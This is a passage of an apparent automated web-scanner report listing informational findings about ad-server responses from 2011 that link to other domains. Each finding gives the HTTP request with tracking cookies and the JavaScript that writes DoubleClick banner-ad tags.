The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90?http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296259812

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:14:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=636403816?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=636403816?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=95030253=_4d435bd9,8503855336,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=95030253/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=636403816?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=636403816?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.138. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3440
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=902448725?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3740.270604.B3/B5112048;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=902448725?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.139. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3440
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/542234199/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=542234199?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/542234199/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=542234199?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/542234199/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=542234199?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3740.270604.B3/B5112048;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=542234199?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.140. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=1711169344?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=1711169344?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.141. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.10;abr=!ie4;abr=!ie5;sz=728x90;ord=2075144341?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

17.142. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=874556783?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
